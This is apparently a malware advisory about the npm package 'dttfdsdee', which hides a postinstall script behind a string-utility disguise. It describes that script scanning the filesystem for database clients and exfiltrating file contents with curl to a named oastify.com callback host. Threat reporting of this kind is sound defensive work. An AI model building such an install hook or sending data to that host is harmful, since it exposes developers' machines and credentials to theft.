dttfdsdee @1.0.6

Summary

package.json declares a postinstall script that runs automatically on npm install. The script walks the entire filesystem with find to locate database client binaries (mysql, mongo, mongosh, psql, redis-cli, sqlite3, elasticsearch), writes the results to /data/db_clients_check.txt, and then uses curl -X POST to send local file contents to an out-of-band callback at http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com (oastify.com is the Burp Collaborator OOB interaction domain). The package presents itself as a generic string-utility helper with benign filler in index.js, but the advertised purpose is wholly inconsistent with the install-time behavior; metadata is hollow (empty author, empty repository, empty homepage) and the name is a random string — consistent with disposable reconnaissance bait. Installing the package on a developer or CI machine causes immediate filesystem reconnaissance and exfiltration to attacker-controlled infrastructure.

Source: amazon-inspector (ae565bed85ec0db27f1ff658c7e9491591ce40edc56f423cd8b1122bc209c69c)